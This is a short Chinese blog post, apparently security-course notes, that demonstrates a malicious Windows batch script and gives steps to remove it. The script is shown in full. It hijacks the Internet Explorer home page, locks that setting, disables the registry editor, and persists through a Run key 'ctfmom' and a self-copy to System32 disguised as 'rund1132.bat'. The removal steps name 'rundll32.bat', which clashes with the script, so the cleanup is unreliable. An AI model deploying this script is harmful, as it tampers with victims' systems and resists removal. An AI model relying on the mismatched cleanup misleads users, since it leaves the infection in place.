恶意代码效果
将IE浏览器的主页修改为http://www.xxxx.com
锁定Internet选项的“主页”对话框,禁用注册表编辑器
准备恶意代码
使用记事本新建一个空文件,输入以下程序代码后另存为“rundll32.bat”
注册表中还添加了一个名为ctfmom的系统开机启动任务,用户每次登录后会自动执行上述代码。这样即使已解除注册表
锁定、修复IE主页,若不清理此启动项,则重新开机后危害依旧
消除恶意程序
删除文件C:\Windows\System32\rundll32.bat
运行gpedit.msc组策略编辑器
用户配置-->管理模板-->系统,将“阻止访问注册表工具”设为“已禁用”
用户配置-->管理模板-->Windows组件-->Internet Explorer,将“禁止更改主页设置”设为“已禁用”
编辑注册表,删除开机启动项“ctfmom”
重新打开Internet Explorer浏览器,修复主页设置
@echo off
reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "http://www.xxxx.com" /f /*
reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRegistryTools" /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "ctfmom" /d "%windir%\System32\rund1132.bat" /f
copy %0 %windir%\System32\rund1132.bat
(老男孩网安课程学习)
来源:oschina
链接:https://my.oschina.net/u/4313784/blog/4490038